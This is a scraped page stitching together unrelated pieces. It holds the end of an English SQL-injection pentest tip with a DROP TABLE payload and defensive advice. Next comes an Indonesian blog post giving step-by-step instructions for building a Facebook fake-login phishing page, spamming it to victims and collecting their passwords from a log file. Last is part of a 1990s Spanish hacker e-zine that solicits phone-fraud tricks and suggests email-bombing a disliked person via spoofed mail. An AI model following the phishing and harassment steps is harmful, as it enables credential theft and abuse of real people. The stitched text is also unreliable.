WHERE name = '\''; DROP TABLE users; --'; -- Boom!

The expression '\'' is a complete string (containing just one single quote), and the usual SQL shenanigans follow. It doesn't stop with backslashes either: there is Unicode, other encodings, and parsing oddities all hiding in the weeds to trip up the application designer.
Getting quotes right is notoriously difficult, which is why many database interface languages provide a function that does it for you. When the same internal code is used for "string quoting" and "string parsing", it's much more likely that the process will be done properly and safely.
Some examples are the MySQL function mysql_real_escape_string() and perl DBD method $dbh->quote($value).
These methods must be used.
Use bound parameters (the PREPARE statement)
Though quotesafing is a good mechanism, we're still in the area of "considering user input as SQL", and a much better approach exists: bound parameters, which are supported by essentially all database programming interfaces. In this technique, an SQL statement string is created with placeholders - a question mark for each parameter - and it's compiled (
"prepared", in SQL parlance) into an internal form.
Later, this prepared query is "
executed" with a list of parameters:
Example in perl

$sth = $dbh->prepare("SELECT email, userid FROM members WHERE email = ?;");

$sth->execute($email);

Thanks to Stefan Wagner, this demonstrates bound parameters in Java:
Insecure version

Statement s = connection.createStatement();
ResultSet rs = s.executeQuery("SELECT email FROM member WHERE name = "
+ formField); // *boom*

Secure version

PreparedStatement ps = connection.prepareStatement(
"SELECT email FROM member WHERE name = ?");
ps.setString(1, formField);
ResultSet rs = ps.executeQuery();

Here, $email is the data obtained from the user's form, and it is passed as positional parameter #1 (the first question mark), and at no point do the contents of this variable have anything to do with SQL statement parsing. Quotes, semicolons, backslashes, SQL comment notation - none of this has any impact, because it's "just data". There simply is nothing to subvert, so the application is be largely immune to SQL injection attacks.
There also may be some performance benefits if this prepared query is reused multiple times (it only has to be parsed once), but this is minor compared to the enormous security benefits. This is probably the single most important step one can take to secure a web application.
Limit database permissions and segregate users
In the case at hand, we observed just two interactions that are made not in the context of a logged-in user: "log in" and "send me password". The web application ought to use a database connection with the most limited rights possible: query-only access to the members table, and no access to any other table.
The effect here is that even a "successful" SQL injection attack is going to have much more limited success. Here, we'd not have been able to do the UPDATE request that ultimately granted us access, so we'd have had to resort to other avenues.
Once the web application determined that a set of valid credentials had been passed via the login form, it would then switch that session to a database connection with more rights.
It should go almost without saying that sa rights should never be used for any web-based application.
Use stored procedures for database access
When the database server supports them, use stored procedures for performing access on the application's behalf, which can eliminate SQL entirely (assuming the stored procedures themselves are written properly).
By encapsulating the rules for a certain action - query, update, delete, etc. - into a single procedure, it can be tested and documented on a standalone basis and business rules enforced (for instance, the "add new order" procedure might reject that order if the customer were over his credit limit).
For simple queries this might be only a minor benefit, but as the operations become more complicated (or are used in more than one place), having a single definition for the operation means it's going to be more robust and easier to maintain.
Note: it's always possible to write a stored procedure that itself constructs a query dynamically: this provides no protection against SQL Injection - it's only proper binding with prepare/execute or direct SQL statements with bound variables that provide this protection.
Isolate the webserver
Even having taken all these mitigation steps, it's nevertheless still possible to miss something and leave the server open to compromise. One ought to design the network infrastructure to assume that the bad guy will have full administrator access to the machine, and then attempt to limit how that can be leveraged to compromise other things.
For instance, putting the machine in a DMZ with extremely limited pinholes "inside" the network means that even getting complete control of the webserver doesn't automatically grant full access to everything else. This won't stop everything, of course, but it makes it a lot harder.
Configure error reporting
The default error reporting for some frameworks includes developer debugging information, and this cannot be shown to outside users. Imagine how much easier a time it makes for an attacker if the full query is shown, pointing to the syntax error involved.
This information is useful to developers, but it should be restricted - if possible - to just internal users.

Note that not all databases are configured the same way, and not all even support the same dialect of SQL (the "S" stands for "Structured", not "Standard"). For instance, most versions of MySQL do not support subselects, nor do they usually allow multiple statements: these are substantially complicating factors when attempting to penetrate a network.

We'd like to emphasize that though we chose the "Forgotten password" link to attack in this particular case, it wasn't really because this particular web application feature is dangerous. It was simply one of several available features that might have been vulnerable, and it would be a mistake to focus on the "Forgotten password" aspect of the presentation.

This Tech Tip has not been intended to provide comprehensive coverage on SQL injection, or even a tutorial: it merely documents the process that evolved over several hours during a contracted engagement. We've seen other papers on SQL injection discuss the technical background, but still only provide the "money shot" that ultimately gained them access.

But that final statement required background knowledge to pull off, and the process of gathering that information has merit too. One doesn't always have access to source code for an application, and the ability to attack a custom application blindly has some value.

Jumat, 26 Februari 2010

Hello semua,
hack facebook dengan fake login? Kenapa Tidak…
Jangan lupa sediain Hosting / Free Hosting untuk naruh script yang mau kita buat fake login lokasinya nanti. Jangan sampe lupa, karena itu hal yang paling wajib dilakukan!

Oke lanjut, mantapin juga dah. Perhatikan Baik² Dan Lakukan Dengan Benar Menurut Petunjuk Dibawah Ini. Jangan Sampe Ada Kekeliruan Sedikitpun! Berikut ini adalah ulasannya:


1. Pertama, bikin dulu sebuah file di hosting tempat anda mau bikin fake login dengan filetype: html. Kemudian kasi nama: “index.html“, sehingga di contoh URL Web adalah: http://www.hostingloedisini.com/facebook/index.html

Bikin Code Sesuai Dengan Contoh Script Dibawah Ini:

Scriptcode pada no 1:
Klick disini Untuk downlod script loginnya

2. Buat file logs.php di hostingan lo sendiri, contoh http://www.hostingloedisini.com/facebook/logs.php di bawah ini script nya.

Scriptcode pada no 2:
Klick disini Untuk download email palsunya

3. Jangan lupa dan wajib untuk membuat file kosong yg berformat txt dengan nama: logs.txt – jadi URLnya jadi: http://www.hostingloedisini.com/facebook/logs.txt

4. Ini wajib dan harus diingat! Jangan lupa change mode semua filenya, sehingga permissionnya menjadi: 777 ( chmod + 777). Chmod 777 artinya dimana semua file dapat dibaca (r), dapat ditulis(w), dan dapat di eksekusi(x). Jadi chmod 777 adalah untuk merubah file agar file tersebut dapat di eksekusi oleh User, Groups & Other. Hasil set file permission 777 adalah (rwxrwxrwx) untuk Unix Server. Untuk masalah permission ini juga tergantung dari penyedia hosting, buat yang pake hosting gak nyediain change mode, langsung ajah dicoba tanpa memperhatikan poin ini & berdoa saja ini bisa berjalan.. Selain 777 explore permission bisa menjadi 775, 755 disesuaikan dengan server dan penyedia hosting anda.

5. Kemudian sebarkan URL yang telah loe buat, misal: “http://www.hostingloedisini.com/facebook/” dengan sesama user difacebook, iklan, atau spam lewat email sebanyak banyaknya. Bisa juga merajuk kepada cewe cewe / cowo cowo yang loe suka supaya klik tu login. Dijamin mantaf klo bisa dapetin username + loginnya! :D

6. Untuk melihat hasil login Username dan Passwordnya silakan buka file di logs.txt nya, nah klo ada username email beserta passwordnya. Brarti anda telah dapet login ntuh.

Contoh tampilan ujicoba aplikasi websitenya disini:
http://www.airdata.nl/libraries/tcpdf/config/lang/facebook/index.html

Selamat Mencoba, Semoga Berhasil..

Dan buat para Facebook’ers mania, oh ya, ni skalian gw kasi tips supaya hati hati & biar gak kna Fake Login:

1) Perhatikan dengan benar link address websitenya. Contoh klo FB linknya: http://www.facebook.com

2) Jangan pernah membuka link atau bahasa pemograman (CSS, XTML, XML, atau
HTML) yang aneh. Jika di klik, kemungkinan account kita akan memberikan
username dan password kita.

3) Pakailah virtual keyboard yang bisa diperoleh dengan mudah.
Untuk Windows tampilan XP, hanya cukup klik ’start’ -> All Programs ->
Accessories -> Accessibility -> ‘On-Screen Keyboard’
Untuk Windows tampilan bukan XP, hanya cukup klik ’start’ -> Program Files
-> Accessories -> Accessibility -> ‘On-Screen Keyboard’

4) Bila bermain di Warung Internet (Warnet), hindari check-list kotak
“Remember me” pada saat login, karena hal itu dapat menyimpan username
dan password di komputer tersebut. Kecuali memakai komputer pribadi.

5) Jika anda tiba-tiba diminta login ulang, sebaiknya hati hati, karena kemungkinan halaman pe-login ulang tersebut adalah halaman palsu yang sengaja dirancang. Kekekeke..

Enter your email address untuk Berlangganan Artikel Viandraminerva:

Delivered by Viandra

Rabu, 10 Februari 2010

R&GR&GR&GR&GR&GR&GR&GR&GR&GR&GR&R&G
R&G R&G
R&G õRareGaZzõ R&G
R&G <<::La Droga sin Bajon::>> R&G
R&G R&G
R&GR&GR&GR&GR&GR&GR&GR&GR&GR&GR&GR&

Numero 2

En este numero nos enfocamos en la cuestion de la privacidad en
la red y en el hogar con sistemas de encripcion. Ademas echamos
un vistazo a como funcionan los sistemas de la red y que
sistemas operativos operan dando como resultado, 'Hacking
Websites & HomePages' por Le PompeItor.

Para todos aquellos surfeadores empedernidos como nosotros,
incluimos una lista de los mejores websites que ofrezcan algun
servicio a los visitantes y que ademas sea gratuito.

Si quieres estar al tanto de lo que sucede con relacion a
las computadoras en el mundo que gira a tu alrededor basta con
que leas la seccion de NotiLOONS escrita por colaboradores de
esta revista.

La respuesta de ustedes despues del primer numero ha sido
agradable y esperamos seguir contando con buenos textos. Para
lograr esto necesitamos la colaboracion de todos los lectores de
este magaZine.

RareTrip

O
o
RareGaZz ø

-Articulos-

1- Guia para Internet por Le PompeItor
2- Hacking WebSites & HomePages por Le PompeItor
3- Manual de TCP/IP articulo 2 de 2
4- Sistemas de encripcion por KillerBot
5- Que es PGP? por KillerBot
6- Los 10 mejores Websites por RareTrip
7- Codigos de registro
8- JavaScript para HomePages por KillerBot
9- Trucos para Unix por Shark
10- Seccion de Software
11- NotiLoons

RareGaZz esta escrito por usuarios de la red que lo hacen en forma
anonima y la persona encargada de la edicion de esta revista no se
hace responsable por los da¤os fisicos, morales, religiosos, etc.,
que la lectura o los archivos contenidos en este numero originen.
En pocas palabras, si este texto sale de la pantalla mata tu perro
o hace explotar el monitor de tu PC no nos hacemos responsables;-)

Participa enviando textos a las siguientes direcciones:

RARETRIP@CYBERDUDE.COM
RAREGAZZ@BIGFOOT.COM

Los textos que mandes pueden estar encriptados con la siguiente
llave publica para poder verificar el originario del mensaje. Si
el texto lo pirateaste de alguna otra revista por favor menciona
el nombre y numero en que aparecio el texto original.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzNQT8QAAAEEAMW6UQtjaxW/45q4OiG3IeahuKkRgSzIBnzlSlAm88/S1hmA
qUa92gv/Fjy3QiLOVuZW2J00oNNIClnQBwlQ9mDopRKiGnYcdU8Ll7d76WmRttrh
D60AKVXMkEm0wYvp7Xg57Ecbm3Ao4jP3SiP910ID/ukPQOFswbBNiqTF4fXZAAUT
tB9SYXJlR2FaeiA8UmFyZUdhWnpAQmlnZm9vdC5Db20+
=RXuI
-----END PGP PUBLIC KEY BLOCK-----

!!Atencion!!
Se solicitan PHREAKERS para la publicacion de esta revista. Si alguien de
ustedes sabe como hacer llamadas locales o larga distancia gratis desde
cualquier tipo de telefono sea publico o privado mandenos sus trucos y
mencionen bajo que compa¤ia funcionan (TelMex/Telnor/Alestra/etc).
Ademas, si alguien sabe como fabricar tarjetas para usar telefonos publicos
esta es su oportunidad para tener clientes por todo Mexico! Hay muchas
formas de recibir el dinero anonimamente para evitar ser sorprendido.
En el numero 3 de RareGaZz se explica como mandar correo electronico
totalmente ANONIMO por si tienen informacion sensible los usen para
comunicarse con nosotros.

0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=

xx xx xx xx xx xx xx xx xx xx xx xx
xx xx
xx Guia para Internet xx
xx por xx
xx Le PompeItor xx
xx xx
xx xx xx xx xx xx xx xx xx xx xx xx

"Internet es un desastre"
-Usuario sin RareGaZz

"Yo se que Internet es un desastre"
-Usuario con RareGaZz

Introduccion
~~~~~~~~~~~~
Para las personas que estan empezando a distinguir entre WWW y FTP internet
puede parecerles complicado y dificil de navegar por que dedican demasiado
tiempo buscando algun tema y pocas veces lo encuentran. Esto es una verdad
pero, si hicieran uso de los diferentes servicios que ofrece internet, sin
lugar a dudas agilizarian sus movimientos en Internet.
Para eso es esta guia.

1. Nombres de dominio y direcciones
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Las direcciones en Internet son tan largas y dificiles de recordar como
128.128.57.83 que si tuvieras que recordarlas necesitarias algo mejor que
un cerebro tipico. Para evitar que tomemos medicamento o radiacion que en
verdad dista de ser confiable, internet ha adquirido los nombres de dominio.
Todos los Host registrados en Internet deben de tener nombres que reflejen
los dominios bajo los que estan registrados. Estos nombres son llamados
'Nombres de Dominios Enteramente Calificados' o 'Fully Qualified Domain
Names'por sus siglas en Ingles (FQDNs).

Ahora examinemos un nombre de Dominio:

lilac.berkeley.edu
^ ^ ^
| | |
| | |____ ``edu'' muestra que este Host es patrocinado por
| | una organizacion educativa. Este es un dominio
| | de el primer nivel.
| |
| |___________ ``berkeley'' es el dominio de segundo nivel, nos
| muestra la ubicacion del dominio. (Berkeley)
|
|
|__________________ ``lilac'' es el dominio de Tercel nivel, indica el
nombre de la computadora HOST.

Este es una lista de los dominios de primer nivel que te encontraras:

|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
| Dominios de primer nivel comunes |
| |
| COM - empresa comercial (con fines de lucro pues) |
| EDU - institucion educativa |
| GOV - organizacion de gobierno |
| MIL - organizacion militar |
| NET - una red |
| ORG - institucion sin fines de lucro. l
| |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2. Ubicacion Geografica
~~~~~~~~~~~~~~~~~~~~~~~
Para ubicar geograficamente algun dominio hay que prestar atencion al
nombre del dominio y revisar su ultima extension. En el siguiente ejemplo se
puede apreciar mas claramente:

orca.ens.cetys.mx
^ ^ ^ ^
| | | |____ MX = Indica que este servidor se encuentra en MEXICO
| | |_________ CETYS = Institucion Educativa
| |______________ ENS = Indica que se encuentra en ENSENADA
|__________________ ORCA = Nombre de la computadora Host

�����������������������������������¿
³ Extensiones Usadas en Dominios ³
������������������������������������
(copiados de un texto escrito por Gatsby)

-EXTENSION - UBICACION - EJEMPLO-

.AQ New Zealand
.AR Argentina atina.ar
.AT Austria pythia.eduz.univie.ac.at
.BB Barbados
.BE Belgium ub4b.buug.be
.BG Bulgaria
.BO Bolivia unbol.bo
.BR Brazil fpsp.fapesp.br
.BS Bahamas
.BZ Belize
.CA Canada cs.ucb.ca
.CH Switzerland switch.ch
.CL Chile uchdcc.uchile.cl
.CN China ica.beijing.canet.cn
.CR Costa Rica huracan.cr
.CU Cuba
.DE Germany deins.informatik.uni-dortmund.de
.DK Denmark dkuug.dk
.EC Ecuador ecuanex.ec
.ES Espa¤a
.EE Estonia kbfi.ee
.EG Egypt
.FI Finland funet.fi
.FJ Fiji
.FR France inria.inria.fr
.GB England
.GR Greece csi.forth.gr
.HK Hong Kong hp9000.csc.cuhk.hk
.HU Hungary sztaki.hu
.IE Ireland nova.ucd.ie
.IL Israel relay.huji.ac.il
.IN India shakti.ernet.in
.IS Iceland isgate.is
.IT Italy deccnaf.infn.it
.JM Jamaica
.JP Japan jp-gate.wide.ad.jp
.KR South Korea kum.kaist.ac.kr
.LK Sri Lanka cse.mrt.ac.lk
.LT Lithuania ma-mii.lt.su
.LV Latvia
.MX Mexico mtec1.mty.itesm.mx
.MY Malaysia rangkom.my
.NA Namibia
.NI Nicaragua uni.ni
.NL Netherlands sering.cwi.nl
.NO Norway ifi.uio.no
.NZ New Zealand waikato.ac.nz
.PE Peru desco.pe
.PG New Guinea ee.unitech.ac.pg
.PH Philippines
.PK Pakistan
.PL Poland
.PR Puerto Rico sun386-gauss.pr
.PT Portugal ptifm2.ifm.rccn.pt
.PY Paraguay ledip.py
.SE Sweden sunic.sunet.se
.SG Singapore nuscc.nus.sg
.SU Russians kremvax.hq.demos.su
.TH Thailand
.TN Tunisia spiky.rsinet.tn
.TR Turkey
.TT Trinidad & Tobago
.TW Taiwan twnmoe10.edu.tw
.UK United Kingdom ess.cs.ucl.ac.uk
.US United States isi.edu
.UY Uruguay seciu.uy
.VE Venezuela
.ZA South Africa hippo.ru.ac.za
.ZW Zimbabwe zimbix.uz.zw


3. Servicios en Internet
~~~~~~~~~~~~~~~~~~~~~~~~

TELNET= Es un tipo de conexion que permite a un cliente usar un servidor
sin estar fisicamente cerca de el. Para manejar un servidor es
necesario el aprendizaje del sistema operativo UNIX.

FTP= Es un protocolo universal de transmision de archivos que permite
intercambiar archivos entre computadoras con distintas
configuraciones.

ARCHIE= Son servidores que permiten realizar busquedas sobre alguna
cadena de texto en la descripcion de algun producto de software, en
caso de encontrarlo se le notifica al usuario que programa
contiene esa linea de texto en su descripcion y le indica donde
puede 'bajarlo'. Las busquedas con archie son un poco complicadas
a menos que cuentes con un programa que las realize en modo grafico
como FpArchie disponible en:
www.zdnet.com/pccomp/freestuff/

IRC= Este servidor te permite conectarte a un servidor IRC y podras
platicar en tiempo real con usuarios de todo el mundo. Si necesitas
informacion especifica sobre algo solo necesitarias entrar a un
'canal' de IRC sobre el tema que andes buscando y preguntar donde
puedes conseguir lo que necesitas e inmediatamente alguien te
contestara seguramente. Los programas para IRC son variados aunque
en verdad es un poco dificil de usar por la sintax de los comandos.
Existe un programa llamado mIRC con interfaz grafica que hace
'ligeramente' mas facil de usar el servicio de IRC. El programa
mIRC es Shareware y lo puedes encontrar e n WWW.SHAREWARE.COM o
WWW.DOWNLOAD.COM, solo escribe mIRC en la maquina de busqueda
bajo la categoria "windows all"

WWW= Para accesar a este tipo de servicios necesitaras un navegador,como
Internet Explorer o Netscape Navigator. La pregunta cual de los 2
es mejor esta muy de moda pero como dicen por ahi "Nunca sigas la
moda". En verdad que tienen algunas diferencias pero la verdad
sirven para lo mismo,ademas esta revista es gratuita y sin relacion
comercial con ningun producto.

E-MAIL= El correo electronico es mas rapido y barato que el convencional,
y no tiene ningun dia para festejarlo ( imagina el dia del
servidor de e-mail:-). Con el se pueden accesar algunos servicios
interesantes como las LISTAS DE CORREO que son 'comunidades' en
las que se tratan temas especificos.
Tambien existen servicios para transferir archivos via e-mail en
el dado caso de que un usuario no tenga acceso a FTP podria
de cualquier manera recibir los archivos a su direccion de e-mail.


3.1 Telnet
~~~~~~~~~~~
Los servidores telnet generalmente son bases de datos o BBS donde puedes
platicar en vivo con otras personas y hacer algunas cosas interesantes como
poner mensajes (post) para que los lean los demas usuarios.Algunos servidores
telnet son:

=Super Tip RareGaZz=
Si deseas conectarte via telnet a tu propio servidor haz telnet a:
127.0.0.1
En el login y password escribe tus datos personales y estaras en
el corazon de el sistema que usas para conectarte a Internet. Deberas
usar comandos UNIX para moverte por los directorios.
Si tu servidor tiene una barrera de fuego (firewall) no podras conectarte
via Telnet. A menos que uses un script PERL desde otra terminal UNIX
=Fin de Super Tip=

Cimarron BBS (En espa¤ol ) Encontraras platicas y cosas agradables.
131.178.17.60. <--- Si no puedes conectarte intenta: bugs.mty.itesm.mx
Login: BBS
*Nota: Algunas veces no se puede conectar al servidor.

Club Iteso (Mexicano)
club.gdl.iteso.mx

Temas Anti-virus (ingles)
guest@freenet.victoria.bc.ca
cuando se realize la conexion escibe GO VIRUS para ver temas Anti-Virus

American Philosophy Association BBS
atl.calstate.edu
Login: apa

CARL (Base de Datos, Revistas, Revisiones sobre libros, etc)
pac.carl.org

Cheeseplant's House (Platicas en vivo)
137.205.192.5

Chess Server (Juega/Observa juegos de ajedrez)
lark.utah.edu 5000
Escribe "HELP" si necesitas ayuda

Dante Project (Todo sobre el escritor de la Divina Comedia)
library.dartmouth.edu
Login: connect dante

INFO - Rutgers CWIS (CIA World Factbook, Diccionario en Ingles, etc)
hangout.rutgers.edu 98

IRC Telnet (Platicas IRC)
128.2.54.2

Biblioteca del Congreso de los Estados Unidos
192.65.218.43

NASA (Ofrece fechas de lanzamientos, e informacion de los satelites)
128.158.13.250

Software Server (Un servidor de software parecido a ARCHIE)
130.166.2.150 5742

UNC BBS (Acceso a Bibliotecas de la nacion de EUA)
128.109.157.30

Weather Service (Informacion metereologia para los estados o ciudades de EUA)
141.212.196.79 3000

World-Wide Web (Acceso a documentos relacionados con la red)
128.141.201.74


3.1.1 Telnet desde Una terminal Unix
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Para ingresar a cualquiera de estos servidores basta con que ejecutes el
programa para iniciar una sesion TELNET y escribas el nombre del servidor
HOST. Algunos servidores preguntaran por un Login y deberas escribir el que
aparece en este texto abajo de su direccion.
Algunos comandos para manejar TELNET desde una terminal UNIX son:

TELNET =Este comando te llevara al prompt telnet: telnet>
CLOSE =Cierra la conexion telnet.
DISPLAY =Muestra los parametros operacionales.
OPEN {server}=Abre una conexion telnet.
QUIT =Sale del prompt Telnet.
SEND =Envia algun archivo.
STATUS =Muestra el status de una conexion.
HELP =Muestra el instructivo de Telnet.

3.2 FTP (File Transfer Protocol)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
FTP es una gran herramienta que nos sirve para accesar servidores que cuentan
con una gran cantidad de archivos y los ponen a la disposicion del usuario.Si
usas un programa como WS-FTP.EXE deberas escribir el Login y Password para
poder entrar al servidor, generalmente son:

LOGIN: ANONYMOUS
PASSWORD: {tu direccion internet} o GUEST

Los servidores FTP estan ordenados en directorios con nombres relacionados
a los programas que almacenan. Las utilerias para Internet se encuentran casi
siempre en /PUB/WINSOCK Algunos servidores FTP son:

Software para Internet (/ftp/pub/winsock)
trumpet.com
Login: ANONYMOUS
Password: GUEST

Servidor de Documentos (Varios incluyendo la biblia) >Ingles<
128.32.184.254

Software de Todo tipo (Se recomienda que primero copies INDEX)
oak.oakland.edu
Login: ANONYMOUS
Password: GUEST

Informacion sobre listas de correo, newsgroups, etc.
192.33.33.22

Documentos Internet
ds.internic.net

MagaZines Electronicos (Aun no tienen RareGaZz)
ftp.std.com

3.2.1 FTP desde un prompt Unix
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Para iniciar una sesion FTP en un servidor que use Unix deberas escribir en
el prompt FTP ejemplo:

( # Simboliza el prompt UNIX y las minusculas son las entradas del usuario )

#ftp
FTP> open oak.oakland.edu <-- Abre conexion
CONNECTED TO OAK.OAKLAND.EDU
LOGIN: anonymous <-- Login como anonymous
PASSWORD: guest <-- Password guest
WELCOME TO OAK.OAKLAND.EDU
FTP>get index <-- Obtener index del servidor
ASCII FILE BLAH BLAH BLAH 100%
FTP>close <-- Cerrar conexion
FTP>quit <-- Salir del prompt FTP

Comandos FTP desde una terminal:

pwd =Muestra el directorio en el que te encuentras.
ls =Es similar a DIR de MS-DOS
ls -a =Muestra los archivos incluyendo aquellos escondidos
cd =cambia de directorio ej. 'cd /etc/winsock'
get =Obtiene un archivo. Ejemplo: FTP> get /pub/virus/natas.zip
cdup =Cambia el directorio a uno mas 'abajo'. Si te encuentras en el
directorio /etc/pub y escribes cdup te encontraras en /etc
cd .. =Igual que el comando anterior.
mdir =Crea un directorio.
rmdir =Elimina un directorio.
close =Cierra la conexion.

3.3 ARCHIE
~~~~~~~~~~
Este es un servicio ofrecido por algunos servidores para localizar archivos
basado en caracteristicas especificas como el nombre, funciones o cualquier
grupo de palabras que describan la funcion del programa.
El servidor se basa en las descripciones de los programas que se encuentran
en una basa de datos y compara las palabras indicadas por el usuario con esa
base y los resultados dependen de la exactitud de las palabras escogidas por
el usuario para describirlo.

3.3.1 Interfaz
~~~~~~~~~~~~~~
La interfaz de este servicio es un poco 'primitiva', ya que el usuario tiene
que usar comandos largos y hacerlo en modo terminal, es decir, frente a un
prompt solamente. El programa que se usa para accesar estos servidores es
TELNET.
Yo he adquirido un programa llamado FpArchie que permite al usuario usar
archie en forma de Ventanas y sin mas problemas. Puedes encontrar este
programa en la siguiente URL:

http://www.zdnet.com/pccomp/freestuff/

3.3.2 Servidores Archie
~~~~~~~~~~~~~~~~~~~~~~~
Para accesar a estos servidores executa el programa TELNET y cuando pregunte
con que Host conectarse puedes escoger uno de los siguientes:

archie.unl.edu
archie.rutgers.edu
archie.mcgill.ca
archie.funet.fi
archie.ans.net

Si deseas buscar mas servidores archie puedes buscar en alguna maquina de
busqueda como infoseek.com, yahoo.com, webcrawler.com, etc. con las palabras
clave de 'archie servers'.

3.3.3 Ejemplo de Busqueda
~~~~~~~~~~~~~~~~~~~~~~~~~
Este es un prompt ejemplo de un servidor archie, los comandos que a
continuacion se usan son reales y puedes tomarlos como un ejemplo.
(No escribas el prompt ">")

> TELNET some.archie.server
Welcome to Archie Server from whatever University Command:
> set search sub (define una busqueda en cadena)
> set pager (detiene la pantalla cuando se llena)
> set maxhits 40 (Maximo 40 resultados)
> prog graficas (Busca programas con la subcadena 'graficas')
ZERO 'graficas' FOUND!
> quit (Para terminar la sesion)

[Editor:Ejemplo de busqueda reproducido de PcComputing a¤o 4 Numero 2]

3.4 IRC (Internet Relay Chat)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Con este servicio puedes platicar en vivo con personas de todo el mundo en
tiempo real para compartir consejos, trucos, ideas, bueno ya tienes la idea.
Solo necesitas un programa para conectar a IRC. Existen algunos programas
que permiten usar IRC en modo grafico como mIRC lo que facilita el uso de
este servicio.

3.4.1 COMANDOS
~~~~~~~~~~~~~~
Cuando se conecte a un servidor IRC aparecera la pantalla de introduccion
con alguna informacion sobre el servidor y despues aceptara cualquiera de
los siguientes comandos:

/help Este comando desplegara una lista de comandos basicos.

/list Muestra una lista de los 'canales' a los que te puedes unir para
iniciar una platica.

/join <#canal> Con este comando entras a un cuarto de platicas.

/nick <sobrenombre> Con este comando te asignas un sobrenombre para usar en
los cuartos de platica.

/who <#canal> Despliega en la pantalla los sobrenombres de las personas en
ese cuarto.

/quit Sale del cuarto IRC

3.4.2 Servidores IRC
~~~~~~~~~~~~~~~~~~~~
Yo en lo personal he visto pocos servidores IRC en espa¤ol pero estoy seguro
que existen algunos por ahi, solo conozco la direccion de este:

next00.mty.itesm.mx <--Espa¤ol
irc.arrakis.es <--Espa¤ol
irc.colorado.edut <--Ingles

[Nota del Editor: Algunas Partes de la seccion de IRC incluyendo los
servidores y comandos han sido reproducidos ilegalmente de la revista
Pc Computing Numero 10 a¤o 3. Se solicitan servidores IRC en espa¤ol!]

7. WWW (World Wide Web)
~~~~~~~~~~~~~~~~~~~~~~~
Internet comenzo a ganar popularidad y usuarios cuando se implemento el
servicio World Wide Web que permitia a los usuarios navegar por internet
mas graficamente gracias al lenguage HTML (Hyper Text Markup Languaje) que
permitia el uso de ligas (links) a distintos lugares de la red evitando asi
el tener que escribir largas direcciones en el modo de una terminal como
antiguamente se acostumbraba hacer.

Un navegador es un programa que permite ver las paginas WWW en forma grafica,
Existen distintos navegadores pero la cima esta dividida en dos productos:

Internet Explorer Windows 3.1
www.microsoft.com/ie/platform/win31msie.htm

Netscape Navigator 2.02 (Recomendado para Windows 3.x)
ftp://ftp2.netscape.com/pub/navigator/2.02/windows

Netscape Navigator 3.0 (Recomendado para Windows 95)
ftp://ftp2.netscape.com/pub/navigator/3.0/windows

-Acomodados en orden alfabetico-

8. E-mail
~~~~~~~~~
El correo electronico es la aplicacion de internet mas usada por su rapidez
de envio, por ser gratuito y por extender la comunicacion a todo el planeta.
En internet no existe el riesgo de una huelga de carteros ya que este
servicio es operado por computadoras.
Ofrece distintos servicios y segun las estadisticas es la aplicacion de
Internet mas usada en todo el mundo.

8.1 Los servicios
~~~~~~~~~~~~~~~~~
Existen servicios disponibles para el correo electronico como FTP, LISTAS DE
CORREO, NEWSGROUPS, entre algunos otros.

8.1.1 FTP
^^^^^^^^^
BITFTP@PUCC.PRINCETON.EDU

Esta es la direccion de un servidor FTP que enviara los archivos que
solicites a tu cuenta de internet codificados UUENCODED Para recibir
una completa lista de comandos disponibles manda un un mensaje con la
siguiente informacion:

Subject:(Presiona Enter)
Mensaje:help (presiona enter) quit

Un mensaje de ejemplo para usar este servicio seria:

------------------------------------------------------------------------------
To: BITFTP3@PUCC.PRINCETON.EDU
From: Some@Loser.net
Subject:
Body:

FTP ftp.winsite.com UUENCODE
USER anonymous
cd /pub/pc/win95/access
get psic9504.zip
QUIT
------------------------------------------------------------------------------

Un mensaje igual al ejemplo tiraria 12736105 megas en la direccion que haya
enviado el mensaje.
Obviamente puedes mandar correo aparentando ser otra direccion para que le
caigan los megas a una persona que no te caiga bien. Para hacer esto sigue
las instrucciones en RareGaZz numero 1.

8.1.2 Listas de correo
^^^^^^^^^^^^^^^^^^^^^^
En las listas de correo existe una relacion entre los miembros para compartir
conocimiento y puntos de vista. Para encontrar una lista de correo que te
interese busca en servidores FTP el archivo LIST_OF_LISTS para encontrar
listas sobre cualquier tema.
Existe un servicio WWW en la direccion http://www.liszt.com que te permite la
busqueda de una lista basado en una palabra o frase en particular. Segun
nuestras busquedas hay pocas listas en espa¤ol.

Una lista de correo sobre el tema de la filosofia en espa¤ol es:
majordomo-owner@ccc.uba.ar
Para subscribirte envia un mensaje a esta direccion como el siguiente:

To: majordomo-owner@ccc.uba.ar
From: Whoever@you.are
Subject:
Body:

subscribe filosofia Whoever@you.are


Existen algunas listas de correo automaticas que NO permiten la interaccion
sus integrantes, algunas de estas son:

Mercury News (www.merc.com)
Ofrece noticias en mensajes personalizados a la region donde residas. Para
subscribirte visite su pagina e inscribete.(Ver articulo 10 mejores sites)

Cnet News (www.cnet.com)
Es una lista interesante relacionada con las computadoras.Para subscribirte
a esta lista manda un mensaje a DISPATCH@CNET.COM con la siguiente
informacion en el cuerpo del mensaje:

subscribe {direccion de correo electronico}

Shareware (www.shareware.com)
Para enterarte de lo nuevo o popular en shareware subscribete a esta lista
mandando un mensaje a SW-DISPATCH@SHAREWARE.COM con la siguiente linea de
texto en el mensaje:

subscribe shareware-dispatch {direccion de correo electronico}

Listas de correo con Interaccion

majordomo@toad.com (cypherpunks)
Lista dedicada a tratar temas relacionados con Cryptografia, Libertad de
expresion, Programacion, y hasta filosofia. Para inscribirte manda un
mensaje a esta direccion MAJORDOMO@TOAD.COM con la siguiente linea de
texto en el mensaje:

subscribe cypherpunks {direccion de correo electronico}

-Ahora ya podras subscribirte a las listas de correo, pero algunas como
